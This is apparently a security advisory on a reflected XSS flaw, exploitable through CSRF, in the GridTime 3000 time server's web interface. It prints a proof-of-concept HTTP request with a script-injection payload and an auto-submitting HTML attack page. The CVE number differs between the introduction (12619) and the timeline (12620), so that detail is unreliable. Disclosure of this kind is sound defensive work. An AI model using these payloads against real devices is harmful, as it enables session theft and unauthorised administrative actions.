Introduction:
During a security engagement, Leo Diamat discovered that multiple endpoints in theGridTime 3000 GNSS Time Server web application were vulnerable to reflectedCross-Site Scripting (XSS) via an unsanitised token parameter. Because the affected endpoints lacked Cross-Site Request Forgery (CSRF) protections, the XSS vulnerability could be triggered by tricking a victim into visiting an attacker-controlled page, allowing the attacker to steal an authenticated user's session cookie or perform authenticated actions on their behalf.
This vulnerability affects GridTime 3000 firmware 1.0r0.03 through 1.1r0.0 and was assigned CVE-2026-12619 and has a CVSS score of 5.1 (Medium)(CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A).
The Vulnerability:
Multiple endpoints in the GridTime 3000 web application accepted a token parameter that was reflected in the HTTP response without proper sanitisation or output encoding, resulting in reflected Cross-Site Scripting. The following endpoints were found to be affected:
· POST /
· POST /net_admin
The following request demonstrates the XSS payload being submitted via the token parameter:
POST / HTTP/1.1
Host: 192.168.1.50
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Priority: u=0, i
Te: trailers
Connection: keep-alive
token=test</script><script>alert(localStorage.token)</script>
The following screenshot shows the HTTP response reflecting the payload unsanitised:

The following screenshot shows the resulting JavaScript execution in the browser:

Additionally, as these endpoints did not implement Cross-Site Request Forgery (CSRF) protections, the XSS payload could be delivered via a CSRF attack, requiring only that an authenticated victim visit an attacker-controlled web page while able to reach the GridTime 3000 management interface, with no direct interaction with the vulnerable application itself. The following HTML demonstrates a page that automatically submits the XSS payload on load:
<html>
<body>
<form action="https://192.168.1.50/"method="POST">
<input type="hidden" name="token"value="test</script><script>alert(localStorage.token)</script>"/>
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Impact:
An attacker could craft a malicious web page that, when visited by an authenticated victim with network access to the GridTime 3000 management interface, silently triggers arbitrary JavaScript execution in the context of the device's web application. Because the payload is reflected via a CSRF-unprotected endpoint, only interaction from the victim (visiting the attacker's page) is required, allowing the attacker to steal the victim's session cookie or perform authenticated actions on their behalf, effectively resulting in account takeover or unauthorised administrative actions on the device.
Recommendation
- Upgrade to firmware release 1.2r0.0 or later, in which this issue has been resolved.
Disclosure Timeline:
- February 24th, 2026: Issue reported to the GridTime 3000 Security Team (PSIRT)
- February 25th, 2026: Issue acknowledged and PSIRT-127 assigned
- June 21st, 2026: CVE-2026-12620 assigned
- June 21st, 2026: Fix released in firmware 1.2r0.0
- July 8th 2026: Advisory Live